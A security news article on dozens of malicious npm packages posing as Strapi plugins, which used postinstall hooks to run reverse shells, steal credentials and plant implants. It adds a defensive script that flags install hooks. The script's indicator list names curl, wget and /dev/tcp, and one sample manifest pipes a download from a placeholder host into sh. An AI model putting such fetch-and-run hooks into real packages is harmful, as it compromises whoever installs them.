Supply chain, Malware

Extensive compromise facilitated by dozens of illicit npm packages

(Credit: Araki Illustrations – stock.adobe.com)

Thirty-six malicious npm packages masquerading as Strapi CMS plugins have been spreading multiple payloads enabling Redis and PostgreSQL abuse, reverse shell injections, credential harvesting, and persistent implant deployment, according to The Hacker News.

Intrusions involving the packages, each of which carried a postinstall script hook that concealed the malicious code and let it run without any user interaction, began with exploitation of a local Redis instance for remote code execution, scanning of secrets stored on disk, and exfiltration through a Guardarian API module, according to a report from SafeDep.
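Because npm runs the `preinstall`, `install` and `postinstall` lifecycle scripts automatically during `npm install`, a defender's first check on a suspect dependency tree is to list every package that declares one of those hooks and look at what the hook command does. The script below is an added example written for this article, not code from SafeDep, Strapi or the npm project; the package manifests it audits are constructed samples with placeholder names, and the indicator list is a heuristic of my own, not a signature from the report.

```javascript
// Lifecycle hooks that npm executes when a package is installed as a
// dependency from the registry (prepare/prepack run in other contexts).
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Substrings in a hook command that warrant a manual review. Constructed
// heuristic for this example, not an indicator list from the report.
const SUSPICIOUS = [
  'curl ', 'wget ', 'http://', 'https://', '| sh', '| bash',
  'base64', 'child_process', 'eval(', '/dev/tcp/',
];

// Inspect one parsed package.json object and return a finding for every
// install-time hook it declares. A hook with no suspicious substring is
// still reported ('review'), since a benign-looking "node setup.js" can
// hide anything; a hook matching an indicator is rated 'high'.
function auditManifest(manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const indicators = SUSPICIOUS.filter((s) => command.includes(s));
    findings.push({
      name: manifest.name,
      version: manifest.version,
      hook,
      command,
      indicators,
      severity: indicators.length > 0 ? 'high' : 'review',
    });
  }
  return findings;
}

// Audit a whole set of manifests (for example, every node_modules/*/package.json
// parsed with JSON.parse) and return the combined findings.
function auditAll(manifests) {
  return manifests.flatMap(auditManifest);
}

// Constructed sample manifests; names and commands are placeholders.
const SAMPLE_MANIFESTS = [
  { name: 'example-clean-plugin', version: '1.0.0',
    scripts: { test: 'jest', build: 'tsc' } },
  { name: 'example-hook-plugin', version: '1.0.0',
    scripts: { postinstall: 'node ./scripts/setup.js', build: 'tsc' } },
  { name: 'example-downloader-plugin', version: '0.3.2',
    scripts: { postinstall: 'curl -fsSL https://example.invalid/setup.sh | sh' } },
];

for (const f of auditAll(SAMPLE_MANIFESTS)) {
  console.log(`[${f.severity}] ${f.name}@${f.version} ${f.hook}: ${f.command}` +
    (f.indicators.length ? `  indicators=${f.indicators.join(',')}` : ''));
}
```

In practice the input is the parsed `package.json` of every installed package, and the fastest mitigation while reviewing the output is to install with `npm install --ignore-scripts` (or set `ignore-scripts=true` in `.npmrc`) so that no hook runs until it has been read.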

After using a Docker container escape to write a shell payload, the attack proceeds to deliver a reverse shell, write a shell downloader, and scan environment variables and PostgreSQL database connection strings before launching a credential harvester and a reconnaissance payload. Hardcoded credentials and secrets obtained by querying Strapi-specific tables then give the attackers a connection to the target's PostgreSQL database for later abuse and, eventually, the injection of a persistent implant, credential theft, and a persistent reverse shell.

Such findings come amid escalating supply chain intrusions, with a Group-IB report noting npm, PyPI, and other package repositories as leading targets of such attacks.
